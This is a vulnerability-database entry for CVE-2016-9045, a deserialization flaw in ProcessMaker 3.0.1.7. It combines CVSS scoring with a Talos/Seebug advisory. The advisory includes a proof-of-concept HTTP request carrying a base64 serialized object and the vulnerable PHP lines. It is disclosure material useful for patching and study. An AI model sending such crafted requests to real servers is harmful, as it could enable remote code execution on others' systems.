Vulnerabilities > CVE-2016-9045 - Deserialization of Untrusted Data vulnerability in Processmaker 3.0.1.7

CVSS 8.8 - HIGH

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

LOW

Confidentiality impact

HIGH

Integrity impact

HIGH

Availability impact

HIGH

network

low complexity

processmaker

CWE-502

NVD

Published: 2018-09-17

Updated: 2022-12-14

Summary

A code execution vulnerability exists in ProcessMaker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability.

Vulnerable Configurations

Part	Description	Count
Application	Processmaker Processmaker Processmaker 3.0.1.7	1

Common Weakness Enumeration (CWE)

CWE-502 - Deserialization of Untrusted Data

Seebug

bulletinFamily	exploit
description	### Summary A code execution vulnerability exists in ProcessMarker Enterprise Core 3.0.1.7-community. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability. ### Tested Versions ProcessMaker Enterprise Core 3.0.1.7-community ### Product URLs https://www.processmaker.com/community-2 ### CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-502 - Deserialization of Untrusted Data ### Details It was discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type. The following Proof Of Concept request demonstrate the issue: ``` GET /sysworkflow/en/neoclassic/login/sysLoginVerify.php? d=TzoxNToiTXlTUUxDb25uZWN0aW9uIjoyOntzOjY6IgAqAGRzbiI7TjtzOjg6IgAqAGZsYWdzIjtpOjA7fQ== HTTP/1.1 Host: 192.168.56.101 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.56.101/sysworkflow/en/neoclassic/login/login? u=%2Fsysworkflow%2Fen%2Fneoclassic%2Fadmin%2FpmLogo Connection: close ``` The following code was found to be responsible for unsafe deserialization: ``` 26 if (array_key_exists("d", $_GET)) { 27 $_POST = unserialize(base64_decode($_GET["d"])); 28 29 } 30 31 if (! isset ($_POST)) { 32 G::header('location: /sys/' . $lang . '/' . SYS_SKIN . '/' . 'login/login'); 33 } 34 if (isset($_SESSION['sysLogin'])) { 35 $_POST['form'] = $_SESSION['sysLogin']; 36 } 37 38 require_once 'authentication.php'; 39 ``` ### Mitigation Restrict access to known, trusted users and hosts. ### Timeline * 2016-04-28 - Vendor Disclosure * 2017-07-19 - Public Release ### CREDIT * Discovered by Jerzy Kramarz of Portcullis Computer Security Limited.
id	SSV:96471
last seen	2017-11-19
modified	2017-09-14
published	2017-09-14
reporter	Root
title	ProcessMaker Enterprise Core Code Execution Vulnerability(CVE-2016-9045)

Talos

id	TALOS-2017-0314
last seen	2019-05-29
published	2017-07-19
reporter	Talos Intelligence
source	http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0314
title	ProcessMaker Enterprise Core Code Execution Vulnerability

References

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0314